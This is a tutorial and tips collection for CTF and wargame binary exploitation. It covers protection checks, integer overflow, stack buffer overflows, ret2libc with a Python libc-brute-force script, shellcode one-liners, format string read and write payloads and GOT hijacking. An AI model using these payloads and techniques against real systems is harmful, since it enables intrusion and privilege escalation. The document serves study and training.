Binary Exploitation

This post (work in progress) lists tips and tricks collected while doing binary exploitation challenges during various CTFs and the OverTheWire wargames.

Thanks to superkojiman, barrebas and et0x, who helped me learn the concepts.

Basics

Let’s start with some basic concepts and then look at some examples that help make them clear.

  • Big-endian systems store the most significant byte of a word at the smallest address and the least significant byte at the largest address. Little-endian systems, in contrast, store the least significant byte at the smallest address. {% img left /images/big-endian.png 250 250 %} {% img right /images/little-endian.png 250 250 %}
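A quick way to see the difference is to pack the same 32-bit value in both byte orders with Python's struct module. The value 0xdeadbeef is only an illustrative choice.

```python
import struct

value = 0xdeadbeef  # illustrative 32-bit value

# ">" means big-endian: most significant byte at the lowest address
big = struct.pack(">I", value)
# "<" means little-endian: least significant byte at the lowest address
little = struct.pack("<I", value)

print(big.hex())     # deadbeef
print(little.hex())  # efbeadde
```

x86 and x86-64 are little-endian, which is why addresses in payloads are written "backwards".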

Initial Checks?

When you get a binary for exploitation, you need to find out whether it is a 32-bit or 64-bit ELF, which platform it runs on, whether any buffer overflow prevention techniques are in use, and what the EIP offset is.

Binary Architecture

Check whether the machine the binary runs on is x86 or x86-64.

uname -a

Check whether the binary is compiled for 32-bit or 64-bit.

file binary_file
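If the file tool is not available, the same information can be read from the first bytes of the ELF header. The sketch below is a minimal version that only looks at the magic, the class byte and the data-encoding byte; the function names are made up for this example.

```python
ELF_MAGIC = b"\x7fELF"
EI_CLASS = {1: "32-bit", 2: "64-bit"}            # e_ident[4]
EI_DATA = {1: "little-endian", 2: "big-endian"}  # e_ident[5]

def elf_class(header):
    """Return (word size, byte order) from the first bytes of an ELF file."""
    if len(header) < 6 or header[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    return (EI_CLASS.get(header[4], "unknown"),
            EI_DATA.get(header[5], "unknown"))

def elf_class_of(path):
    """Convenience wrapper: read the identification bytes from a file."""
    with open(path, "rb") as f:
        return elf_class(f.read(16))
```

For example, elf_class_of("./binary_file") would return ("32-bit", "little-endian") for a typical i386 challenge binary.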

Binary Help?

It is probably a good idea to run the binary with the -h or --help flag to check whether any help documentation is provided.

$ ./flagXX -h
Usage: php [options] [-f] <file> [--] [args...]
      php [options] -r <code> [--] [args...]

Binary Protection

Multiple buffer overflow prevention techniques exist, such as RELRO, NoExecute (NX), Stack Canaries, Address Space Layout Randomization (ASLR) and Position Independent Executables (PIE). Each one is applied either by the kernel or by the compiler:

Address space Layout Randomization     : Kernel
Executable Stack Protection            : Compiler
Stack smashing protection              : Compiler
Position Independent Executables       : Compiler
Fortify Source                         : Compiler
Stack Protector                        : Compiler
  • Which buffer overflow prevention techniques are in use can be found by running the checksec script. This script is included in gdb-peda.

  • Whether the stack of the binary is executable can be found with the readelf tool. If the GNU_STACK program header has the E flag (for example RWE), the stack is executable.

narnia8@melinda:~$ readelf -l /narnia/narnia8 | grep GNU_STACK
GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10
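The same check can be scripted. This is a minimal sketch that assumes the one-line-per-header layout readelf prints for 32-bit binaries, as in the output above; 64-bit output wraps each header over two lines and would need a different parser. The function name is made up for this example.

```python
def stack_is_executable(readelf_output):
    """Return True if the GNU_STACK program header carries the E flag."""
    for line in readelf_output.splitlines():
        fields = line.split()
        if fields and fields[0] == "GNU_STACK":
            # Columns: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
            # Flags may be split by spaces (e.g. "R E"), so join them.
            flags = "".join(fields[6:-1])
            return "E" in flags
    raise ValueError("no GNU_STACK header found")

sample = "GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10"
print(stack_is_executable(sample))  # True
```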

To make the stack executable, the program needs to be compiled with the -z execstack option; to disable stack smashing protection, the -fno-stack-protector option should be used.

gcc -ggdb -m32 -fno-stack-protector -z execstack -o buffer1 buffer1.c
  • Address Space Layout Randomization (ASLR) is controlled by /proc/sys/kernel/randomize_va_space.

Three Values:
0  : Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
1  : Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
2  : Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

You can change the setting temporarily by writing a new value to /proc/sys/kernel/randomize_va_space, for example:

echo value > /proc/sys/kernel/randomize_va_space

To change the value permanently, add the setting to /etc/sysctl.conf, for example:

kernel.randomize_va_space = value
and run the sysctl -p command.

If you change the value of randomize_va_space, you should test your application stack to ensure that it is compatible with the new setting. If necessary, you can disable ASLR for a specific program and its child processes by using the following command:

% setarch `uname -m` -R program [args ...]
PIE Enabled

If a binary is PIE enabled, we won’t be able to get the addresses until we run it. One way to deal with this is to disable ASLR on Linux, so that the addresses are always the same during analysis.

  • Use the start command in gdb to load the binary and break near the start of the program

  • Then use vmmap (if using pwndbg) to see the memory layout and find the starting address of the binary

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x555555554000     0x555555556000 r-xp     2000 0      /root/work/lucky/lucky
0x555555756000     0x555555757000 r-xp     1000 2000   /root/work/lucky/lucky
0x555555757000     0x555555758000 rwxp     1000 3000   /root/work/lucky/lucky
  • So the starting address is 0x555555554000; from here we can set breakpoints by adding the offset shown in IDA.

  • You can see the offsets in IDA if you go to Options > General and check Line Prefixes

  • Now you can set a breakpoint. For example, if strcpy() is at offset 0x123, then you can do

br *0x555555554000+0x123
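The base-plus-offset arithmetic can be sketched in a few lines. The helper names below are made up, and the parser assumes vmmap output in the shape shown above (start address first, file path last).

```python
VMMAP = """\
0x555555554000     0x555555556000 r-xp     2000 0      /root/work/lucky/lucky
0x555555756000     0x555555757000 r-xp     1000 2000   /root/work/lucky/lucky
0x555555757000     0x555555758000 rwxp     1000 3000   /root/work/lucky/lucky
"""

def pie_base(vmmap_output, binary_path):
    """Return the lowest start address mapped from binary_path."""
    starts = []
    for line in vmmap_output.splitlines():
        fields = line.split()
        if (len(fields) >= 2 and fields[-1] == binary_path
                and fields[0].startswith("0x")):
            starts.append(int(fields[0], 16))
    if not starts:
        raise ValueError("binary not found in mapping")
    return min(starts)

def breakpoint_command(base, offset):
    """Build the gdb command for an offset taken from the disassembler."""
    return "br *0x%x" % (base + offset)

base = pie_base(VMMAP, "/root/work/lucky/lucky")
print(breakpoint_command(base, 0x123))  # br *0x555555554123
```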

EIP Offsets?

To find the EIP offset, you can use cyclic patterns. Use pattern_create.rb to create a non-repeating pattern to feed to the program, and pattern_offset.rb to find the exact offset of the value that ends up in EIP.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x37654136
[*] Exact match at offset 140
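To see why this works, here is a small sketch of the same idea in Python. It rebuilds the Aa0Aa1Aa2... pattern shown above and searches it for the four bytes found in EIP; it is only an approximation of the Metasploit tools, not a replacement for them.

```python
import string
import struct

def pattern_create(length):
    """Build an Aa0Aa1Aa2... pattern truncated to the requested length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]

def pattern_offset(eip_value, length=8192):
    """Find where the 4 bytes seen in EIP occur in the pattern (-1 if absent)."""
    # EIP holds the bytes in little-endian order, so unpack them that way.
    needle = struct.pack("<I", eip_value).decode("ascii")
    return pattern_create(length).find(needle)

print(pattern_offset(0x37654136))  # 140
```

0x37654136 is the little-endian form of the string "6Ae7", which first appears 140 bytes into the pattern.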

Others

  • Check all the ways user input is provided to the program.

  • Check all the printf statements and see whether any printf directly prints user input (possible format string vulnerability).

  • Check how the flag or input is stored: on the stack (a variable, or read from a file?) or on the heap (dynamic allocation with malloc)?

Integer Overflow

  • A 32-bit signed integer has a range of -2,147,483,648 to 2,147,483,647.

  • Signed integers use the first bit to store whether it is negative or positive, 0 indicating positive and 1 indicating negative.

  • What happens if you add 1 to 2,147,483,647 and store the result in a signed integer? Well the first bit goes from 0 to 1, meaning that the number is now negative! In fact, due to the way Two’s Complement, the method used to represent negative numbers in binary, works, it actually wraps around to the most negative integer: -2,147,483,648.

Example

   if(auction_choice == 1){
    printf("These knockoff Flags cost 900 each, enter desired quantity\n");
    int number_flags = 0;
    fflush(stdin);
    scanf("%d", &number_flags);
    if(number_flags > 0){
        int total_cost = 0;
        total_cost = 900*number_flags;
        printf("\nThe final cost is: %d\n", total_cost);
        if(total_cost <= account_balance){
            account_balance = account_balance - total_cost;
            printf("\nYour current balance after transaction: %d\n\n", account_balance);
        }
        else{
            printf("Not enough funds to complete purchase\n");
        }
    }
}
else if(auction_choice == 2){
    printf("1337 flags cost 100000 dollars, and we only have 1 in stock\n");
    if(bid == 1){

        if(account_balance > 100000){
            /* The flag is read from a file and printed here */
            printf("Flag is XXX\n");
        }
        else{
            printf("\nNot enough funds for transaction\n\n\n");
        }
    }
}

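In the above example, our account_balance has to be greater than 100000 (the initial balance is 1000). total_cost is an int, so its maximum value is 2,147,483,647. As total_cost = 900*number_flags, we can roughly calculate the number of flags needed to overflow total_cost by dividing 2,147,483,647 by 900, which gives about 2,386,092. With a larger quantity the product wraps around; if it wraps to a negative value, it passes the total_cost <= account_balance check, and subtracting it increases account_balance.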
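The wraparound can be simulated to pick a good quantity. This sketch assumes the compiler wraps signed 32-bit arithmetic in the usual two's complement way (strictly speaking, signed overflow is undefined behaviour in C); the helper names are made up for this example.

```python
def to_int32(value):
    """Wrap a Python integer the way a 32-bit two's complement int does."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value

def buy(account_balance, number_flags, price=900):
    """Mirror the purchase branch of the C snippet with 32-bit arithmetic."""
    total_cost = to_int32(price * number_flags)
    if number_flags > 0 and total_cost <= account_balance:
        account_balance = to_int32(account_balance - total_cost)
    return total_cost, account_balance

INT_MAX = 2**31 - 1
smallest_overflow = INT_MAX // 900 + 1  # first quantity whose cost overflows

print(smallest_overflow)             # 2386093
print(buy(1000, smallest_overflow))  # (-2147483596, -2147482700)
print(buy(1000, 4772075))            # (-99796, 100796)
```

Note that the smallest overflowing quantity makes the cost so negative that the balance itself wraps around. A quantity whose cost wraps to a small negative number, such as 4772075 here, leaves a balance just above 100000.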

Buffer overflow

Executable Stack

If the stack is executable, you can put the shellcode in the buffer and then redirect EIP to a NOP sled followed by the shellcode (provided the shellcode used is correct).

Non-executable stack, ASLR Disabled

However, if the stack is not executable or the shellcode is not working (happens sometimes), then we can use one of the following techniques.

Export an environment variable

  • Export an environment variable with shellcode.

  • Find the address of the environment variable on the stack. Use getenvaddr.c to get the address of the environment variable

---getenvaddr.c---

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
       char *ptr;

       if (argc < 3) {
              printf("Usage: %s <environment var> <target program name>\n", argv[0]);
              exit(0);
       } else {
               ptr = getenv(argv[1]); /* Get environment variable location */
               ptr += (strlen(argv[0]) - strlen(argv[2])) * 2; /* Adjust for program name */
               printf("%s will be at %p\n", argv[1], ptr);
       }
 }
  • Set the return address to the start of the shellcode

  • Get a shell

Return2libc

Use return2libc which is a type of ROP

  • Find the address of system function (Run “gdb -q ./program”; break main; p system)

    gdb -q ./retlib
    (no debugging symbols found)...(gdb)
    (gdb) b main
    Breakpoint 1 at 0x804859e
    (gdb) r
    Starting program: /home/c0ntex/retlib
    (no debugging symbols found)...(no debugging symbols found)...
    Breakpoint 1, 0x0804859e in main ()
    (gdb) p system
    $1 = {<text variable, no debug info>} 0x28085260 <system>
    
  • Find the address of “/bin/sh” in the stack or export it in the environment variable and execute it like system(“/bin/sh”). It is in the format of

 <ADDRofSYSTEM> <4ArbitraryBytes for Return Address> <argument for system[/bin/sh]>

4Arbitrary Bytes for Return address could be a JUNK address or "\xCC\xCC\xCC\xCC" or address of exit function.

This layout follows from how a function call works: the parameters are pushed onto the stack first, followed by the return address (the saved EIP of the calling function), and then the saved frame pointer (EBP). The stack pointer (ESP) points to the top of the frame.

Top of stack              lower memory address

Buffer
....
Saved Frame Pointer (EBP)
Saved Return address (EIP)
Function() arguments
Function() arguments

Bottom of stack          higher memory address

If Return Address set to

  • \xCC\xCC\xCC\xCC: after system() returns, execution tries to return to 0xcccccccc and crashes. \xcc is useful as a payload to check that you are actually jumping to your shellcode, and should be removed once you have verified that it works. ret expects an address, not a payload, so \xCC\xCC\xCC\xCC belongs in a payload rather than in the return address slot.

  • A JUNK address: the binary will already have run system() by then, but it will segfault afterwards.

  • The proper address of exit(): the binary will exit cleanly.

It’s better to use /bin/sh instead of /bin/bash, since bash drops privileges. If /bin/bash is used, it will launch, but you’ll find that you haven’t elevated your privileges, which can get confusing. So either find another string that points to /bin/sh or set your own environment variable like DASH=/bin/sh and reference that. Good papers to review are Bypassing non-executable-stack during Exploitation (return-to-libc) and Performing a ret2libc Attack.

  • Sometimes you need to add a cat to keep the shell alive

(cat input; cat) | ./binary

Here input is the file containing the payload you are sending.

Return-Oriented Programming

Msfelfscan can be used to locate interesting addresses within executable and linkable format (ELF) programs, which may prove useful in developing exploits.

/usr/share/framework2/msfelfscan -f stack7
 Usage: /usr/share/framework2/msfelfscan <input> <mode> <options>
Inputs:
        -f  <file>    Read in ELF file
Modes:
        -j  <reg>     Search for jump equivalent instructions
        -s            Search for pop+pop+ret combinations
        -x  <regex>   Search for regex match
        -a  <address> Show code at specified virtual address
Options:
        -A  <count>   Number of bytes to show after match
        -B  <count>   Number of bytes to show before match
        -I  address   Specify an alternate base load address
        -n            Print disassembly of matched data

We can use msfelfscan to find a pop-pop-ret sequence, choose its address and use

pop-pop-ret-addr | 8 bytes junk | address to execute |

where address-to-execute is the address of the environment variable where shellcode is stored.

Non-Executable Stack, ASLR Enabled

If ASLR is enabled, the address of libc changes every time the binary is executed.

for i in `seq 1 5`; do ldd ovrflw | grep libc; done
       libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb762f000)
       libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb758f000)
       libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75ae000)

However, notice that the libc address is not changing much: the first digits (0xb7) and the last three digits (000) remain the same. Because the machine we are working on is probably a CTF machine, we can brute-force the possible libc addresses. It is suggested to figure out the offsets of system, exit and the string “/bin/sh” from the libc base address. Remember,

<ADDRofSYSTEM> <4ArbitraryBytes for Return Address> <argument for system[/bin/sh]>

Find the offset of system, exit and /bin/sh

System

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
  246: 00113d70    68 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
  628: 0003ab40    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
 1461: 0003ab40    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0

Exit function

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
  112: 0002ec00    39 FUNC    GLOBAL DEFAULT   13 __cxa_at_quick_exit@@GLIBC_2.10
  141: 0002e7f0    33 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
  451: 0002ec30   181 FUNC    GLOBAL DEFAULT   13 __cxa_thread_atexit_impl@@GLIBC_2.18
  559: 000b1645    24 FUNC    GLOBAL DEFAULT   13 _exit@@GLIBC_2.0
  617: 00116de0    56 FUNC    GLOBAL DEFAULT   13 svc_exit@@GLIBC_2.0
  652: 00120b60    33 FUNC    GLOBAL DEFAULT   13 quick_exit@GLIBC_2.10
  654: 0002ebd0    33 FUNC    GLOBAL DEFAULT   13 quick_exit@@GLIBC_2.24
  878: 0002ea20    85 FUNC    GLOBAL DEFAULT   13 __cxa_atexit@@GLIBC_2.1.3
 1048: 00120b20    52 FUNC    GLOBAL DEFAULT   13 atexit@GLIBC_2.0
 1398: 001b3204     4 OBJECT  GLOBAL DEFAULT   33 argp_err_exit_status@@GLIBC_2.1
 1510: 000f4130    58 FUNC    GLOBAL DEFAULT   13 pthread_exit@@GLIBC_2.0
 2112: 001b3150     4 OBJECT  GLOBAL DEFAULT   33 obstack_exit_failure@@GLIBC_2.0
 2267: 0002e820    78 FUNC    WEAK   DEFAULT   13 on_exit@@GLIBC_2.0
 2410: 000f54f0     2 FUNC    GLOBAL DEFAULT   13 __cyg_profile_func_exit@@GLIBC_2.2

String /bin/sh

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
15cdc8 /bin/sh

Now, we know the offset of the system, exit and /bin/sh

 1461: 0003ab40    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
  141: 0002e7f0    33 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
15cdc8 /bin/sh

Creation of exploit

Now, when we have the offset, let’s take a sample libc address and create the exploit

from subprocess import call
import struct

#---Offsets of System, Exit and /bin/sh
libc_base_addr = 0xb75e6000
system_offset  = 0x0003ab40
exit_offset    = 0x0002e7f0
binsh_offset   = 0x0015cdc8

#---Calculation of System, Exit, binsh addr
system_addr = struct.pack("<I",libc_base_addr + system_offset)
exit_addr   = struct.pack("<I",libc_base_addr + exit_offset)
binsh_addr  = struct.pack("<I",libc_base_addr + binsh_offset)

#---Creating the payload
buf = "A" * 112
buf += system_addr
buf += exit_addr
buf += binsh_addr

Calling the targeted binary multiple times

#---Execution of the binary multiple times
for i in range(512):
  print("Try :%s" % i)
  ret = call(["/usr/local/bin/ovrflw",buf])

Let’s see a small example where we move an address into the eax register and jump to it. The address we move into eax would contain our shellcode.

;test.asm
[SECTION .text]
global _start
_start:
        mov eax, 0xffffd8bc
        jmp eax

Just good to know: global directive is NASM specific. It is for exporting symbols in your code to where it points in the object code generated. Here you mark _start symbol global so its name is added in the object code (a.o). The linker (ld) can read that symbol in the object code and its value so it knows where to mark as an entry point in the output executable. When you run the executable it starts at where marked as _start in the code.

If the global directive is missing for a symbol, that symbol will not be placed in the object code’s export table, so the linker has no way of knowing about it. We can assemble the asm file with

nasm -f elf test.asm

link it

ld -o test test.o

If you get the below error

ld: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output

either

Assemble for 64 bits instead of 32 with the following command:

nasm -f elf64 test.asm -o test.o

or

If you want to link the file as a 32-bit executable, you can use:

ld -m elf_i386 -s -o test test.o

To see the byte code

objdump -d <file>
  • When exploiting a buffer overflow by placing shellcode on the stack, we mostly place the shellcode before the saved EIP. We should also check whether we can put the shellcode after it. This is particularly useful when some kind of check on the input is applied to the bytes before EIP. Example: suppose EIP is at offset 80. We would usually do

python -c 'print "\x90"*50 + "30 Bytes of ShellCode" + "4 Bytes return address to NOP or shellcode in left"'

However, if some kind of check for alphanumeric characters is applied to the first 80 bytes, you won’t be able to put your shellcode in those 80 bytes. In that case, check whether you can overflow past EIP and redirect execution there. For example

python -c 'print "A"*80 + "4 Bytes return address to NOP or shellcode in right" + "\x90"*50 + "30 Bytes of ShellCode"'

Format String Vulnerability

Definition

If an attacker is able to provide the format string to an ANSI C format function in part or as a whole, a format string vulnerability is present. By doing so, the behaviour of the format function is changed, and the attacker may get control over the target application. A format string is an ASCIIZ string that contains text and format parameters. Example:

printf ("The magic number is: %d\n", 1911);

Behaviour of the format function

The behaviour of the format function is controlled by the format string. The function retrieves the parameters requested by the format string from the stack.

printf ("Number %d has no address, number %d has: %08x\n", i, a, &a);

From within the printf function the stack looks like:

stack top
. . .
<&a>
<a>
<i>
 A
. . .
stack bottom

Crashing the Program

By utilizing format strings we can easily trigger some invalid pointer access by just supplying a format string like:

printf ("%s%s%s%s%s%s%s%s%s%s%s%s");

Because ‘%s’ displays memory from an address that is supplied on the stack, where a lot of other data is stored, too, our chances are high to read from an illegal address, which is not mapped.

Viewing the stack

We can show some parts of the stack memory by using a format string like this:

printf ("%08x.%08x.%08x.%08x.%08x\n");

This works, because we instruct the printf-function to retrieve five parameters from the stack and display them as 8-digit padded hexadecimal numbers. So a possible output may look like:

40012980.080628c4.bffff7a4.00000005.08059c04

This is a partial dump of the stack memory, starting from the current bottom upward to the top of the stack — assuming the stack grows towards the low addresses.

Viewing Memory at any location

We can look at memory locations different from the stack memory by providing an address to the format string.

Our format string is usually located on the stack itself, so we already have near to full control over the space, where the format string lies. The format function internally maintains a pointer to the stack location of the current format parameter. If we would be able to get this pointer pointing into a memory space we can control, we can supply an address to the ‘%s’ parameter. To modify the stack pointer we can simply use dummy parameters that will ‘dig’ up the stack by printing junk:

printf ("AAA0AAA1_%08x.%08x.%08x.%08x.%08x");

The ‘%08x’ parameters increase the internal stack pointer of the format function towards the top of the stack. After more or less of this increasing parameters the stack pointer points into our memory: the format string itself. The format function always maintains the lowest stack frame, so if our buffer lies on the stack at all, it lies above the current stack pointer for sure. If we choose the number of ‘%08x’ parameters correctly, we could just display memory from an arbitrary address, by appending ‘%s’ to our string. In our case the address is illegal and would be ‘AAA0’. Lets replace it with a real one. Example:

address = 0x08480110
address (encoded as 32 bit le string): "\x10\x01\x48\x08"
printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");

This will dump memory from 0x08480110 until a NUL byte is reached. If we cannot reach the exact format string boundary by using 4-byte pops (‘%08x’), we have to pad the format string by prepending one, two or three junk characters. This is analogous to the alignment in buffer overflow exploits.
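Building such a string by hand gets tedious, so here is a small sketch of a builder. The function name and the pops/pad parameters are made up for this example; the right number of pops depends on the target and has to be found by trial.

```python
import struct

def read_payload(address, pops, pad=0):
    """Build [pad][address]_%08x.%08x...|%s| for a 32-bit little-endian target."""
    packed = struct.pack("<I", address)
    if b"\x00" in packed:
        # A NUL byte would terminate the format string before the %s.
        raise ValueError("address contains a NUL byte")
    return (b"A" * pad
            + packed
            + b"_" + b".".join([b"%08x"] * pops)
            + b"|%s|")

print(read_payload(0x08480110, 5))
```

With pops=5 and no padding this produces the same string as the example above.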

Overwriting of Arbitrary Memory

There is the ‘%n’ parameter, which writes the number of bytes already printed into a variable of our choice. The address of the variable is given to the format function by placing an integer pointer as a parameter onto the stack. If we supply a correctly mapped and writable address, this works and we overwrite four bytes (sizeof (int)) at the address:

"\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"

The format string above will overwrite four bytes at 0xbfffc8c0 with a small integer number. We have reached one of our goals: we can write to arbitrary addresses. By using a dummy parameter ‘%nu’ (where n is a field width) we are able to control the counter written by ‘%n’, at least a bit.

Direct Parameter Access

The direct parameter access is controlled by the ‘$’ qualifier

printf ("%6$d\n", 6, 5, 4, 3, 2, 1);

Prints ‘1’, because the ‘6$’ explicitly addresses the 6th parameter on the stack.

The above text is taken from Exploiting Format String Vulnerabilities, which is a good paper to read on format strings.

Write two bytes

We can write two bytes by %hn and one byte by %hhn.

Write four bytes

How to write four bytes? Suppose we need to write 0x8048706 to the address 0xffffd64c.

HOB:0x0804 LOB:0x8706

If HOB < LOB

[addr+2][addr] = \x4e\xd6\xff\xff\x4c\xd6\xff\xff
%.[HOB - 8]x = 0x804 - 8 = 0x7FC (2044) = %.2044x
%[offset]$hn = %6$hn
%.[LOB - HOB]x = 0x8706 - 0x804 = 0x7F02 (32514) = %.32514x
%[offset+1]$hn = %7$hn

python -c 'print "\x4e\xd6\xff\xff\x4c\xd6\xff\xff" + "%.2044x%6$hn%.32514x%7$hn"'
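The arithmetic for the HOB < LOB case can be wrapped in a helper. This is a sketch for a 32-bit little-endian target only; the function name is made up, offset is the stack position of the first address as found by experiment, and bytes %-formatting needs Python 3.5 or later.

```python
import struct

def write_dword_payload(address, value, offset):
    """Two %hn writes: high half goes to address+2, low half to address."""
    hob = (value >> 16) & 0xFFFF  # high-order 16 bits
    lob = value & 0xFFFF          # low-order 16 bits
    if not 8 < hob < lob:
        raise ValueError("this sketch only covers the HOB < LOB case")
    # The two addresses already account for 8 printed bytes.
    payload = struct.pack("<I", address + 2) + struct.pack("<I", address)
    payload += b"%%.%dx%%%d$hn" % (hob - 8, offset)
    payload += b"%%.%dx%%%d$hn" % (lob - hob, offset + 1)
    return payload

print(write_dword_payload(0xffffd64c, 0x08048706, 6))
```

No separator is placed between the two halves, since any extra character would be counted by the second %hn and shift the written value by one.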

Heap Exploitation

Shared Library

A library whose code segment can be shared among multiple processes and whose data segment is unique to each process is called a Shared Library, thereby saving huge amount of RAM and disk space. Shared library is also referred using other names like dynamic library, shared object files, DSO and DLL(Windows).

Hijack the Global Offset Table with pointers

Definition

The Global Offset Table redirects position independent address calculations to an absolute location and is located in the .got section of an ELF executable or shared object. It stores the final (absolute) location of a function calls symbol, used in dynamically linked code. When a program requests to use printf() for instance, after the rtld locates the symbol, the location is then relocated in the GOT and allows for the executable via the Procedure Linkage Table, to directly access the symbols location.

When you disassemble main and a printf call is present, you will see something like

0x080484b9 <+60>: call 0x8048330 printf@plt <----PLT

if you further disassemble printf

gdb-peda$ pdisass printf
Dump of assembler code for function printf@plt:
    0x08048330 <+0>: jmp DWORD PTR ds:0x8049788 <----GOT Address
    0x08048336 <+6>: push 0x0
    0x0804833b <+11>: jmp 0x8048320
End of assembler dump.

Further disassembling the address 0x8049788

gdb-peda$ pdisass 0x8049788
Dump of assembler code from 0x8049788 to 0x80497a8:
  0x08049788 <printf@got.plt+0>:   add    DWORD PTR ss:[eax+ecx*1],0x46
  0x0804978d <fgets@got.plt+1>:    add    DWORD PTR [eax+ecx*1],0x56
  0x08049791 <puts@got.plt+1>: add    DWORD PTR [eax+ecx*1],0x66
  0x08049795 <__gmon_start__@got.plt+1>:   add    DWORD PTR [eax+ecx*1],0x76
  0x08049799 <__libc_start_main@got.plt+1>:    add    DWORD PTR [eax+ecx*1],0x0
  0x0804979d <data_start+1>:   add    BYTE PTR [eax],al
  0x0804979f <data_start+3>:   add    BYTE PTR [eax],al
  0x080497a1 <__dso_handle+1>: add    BYTE PTR [eax],al
  0x080497a3 <__dso_handle+3>: add    BYTE PTR [eax],al
  0x080497a5 <stdin@@GLIBC_2.0+1>: add    BYTE PTR [eax],al
  0x080497a7 <stdin@@GLIBC_2.0+3>: add    BYTE PTR [eax],al
End of assembler dump.

Objdump reflects the same (notice the +1) GOT address:

objdump --dynamic-reloc ./behemoth3

./behemoth3:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049778 R_386_GLOB_DAT    __gmon_start__
080497a4 R_386_COPY        stdin
08049788 R_386_JUMP_SLOT   printf
0804978c R_386_JUMP_SLOT   fgets
08049790 R_386_JUMP_SLOT   puts
08049794 R_386_JUMP_SLOT   __gmon_start__
08049798 R_386_JUMP_SLOT   __libc_start_main

So a quick diagram of what happens looks kind of like this:

[printf()] <--------------------------------
   |                                       |
   --------------> [PLT]--->[d_r_resolve]--|
                     |           |         |
                     -------------------->[GOT]<--
                                 |               |
                                  ------->[libc]--

A good paper to read on this, from which the definition and diagram are taken, is How to Hijack the Global Offset Table with pointers

Tips and Tricks

  • Sometimes we have to use socket re-use shellcode

  • To attach to a network process in gdb, you might have to use

gdb-peda$ set follow-fork-mode child
  • If the parent is killed, children become children of the init process (which has the process id 1 and is launched as the first user process by the kernel). The init process checks periodically for new children and reaps them if they have exited (thus freeing the resources that are held for their return value).

Appendix

GDB Basics

Getting inputs

Taken from Managing inputs for payload injection?

Getting inputs from char *argv[]

We can read the arguments from the initial command line

$> ./program $(python -c 'print("\xef\xbe\xad\xde")')

In gdb, we can pass the arguments through the run command line:

(gdb) run $(python -c 'print("\xef\xbe\xad\xde")')
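One caveat: these one-liners rely on Python 2, where print writes byte strings as they are. Under Python 3, print("\xef\xbe\xad\xde") encodes each character (as UTF-8 on most systems), so the program receives different bytes. A minimal sketch for Python 3, with made-up helper names:

```python
import struct
import sys

def raw_payload(value=0xdeadbeef, padding=0):
    """Return padding bytes followed by value packed as little-endian."""
    return b"A" * padding + struct.pack("<I", value)

def emit(payload):
    """Write bytes to stdout without any text encoding."""
    sys.stdout.buffer.write(payload)
    sys.stdout.buffer.flush()

# What Python 3's print() would send for the same four characters:
as_text = "\xef\xbe\xad\xde".encode("utf-8")
print(len(raw_payload()), len(as_text))  # 4 8
```

Saved with a final emit(raw_payload()) call in a script (say exploit.py, a hypothetical name), this can be used as ./program $(python3 exploit.py) or piped into the program.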
Getting inputs from a file

We can also provide input from file

$> ./program ./myfile.txt

And, within gdb

(gdb) run myfile.txt

Then, outside of gdb you can rewrite the content of the file and run your program again and again in gdb.

Getting inputs from stdin

Getting the input through stdin can be achieved through a wide variety of functions such as fgets(), scanf(), getline(), read() and others. It raises a few problems because the program stops while executing and waits to be fed with characters.

In case you have to deal with several inputs (e.g. login, password, …), you need to use separators between the inputs. Usually the separator between each input is just a newline character (\n or \r depending on the system you are on).

Now, you have two ways to feed stdin. The first is to pass a file

$> cat ./mycommands.txt | ./program

Within gdb, redirect stdin from the file on the run command line

(gdb) run < ./mycommands.txt

And do as said in the previous case.

The other option is to pipe the output of a command to the stdin of the program

$> python -c 'print("\xef\xbe\xad\xde")' | ./program

In gdb we can use the bash process substitution <(cmd) trick:

(gdb) run < <(python -c 'print("\xef\xbe\xad\xde")')

This way is much quicker than creating a named pipe and attaching your program to it. Creating the named pipe outside of gdb requires a lot of unnecessary steps, whereas the previous technique gives you the same result instantly.

Note also that some people use the here-string form <<< $(cmd), like this:

(gdb) run <<< $(python -c 'print("\xef\xbe\xad\xde")')

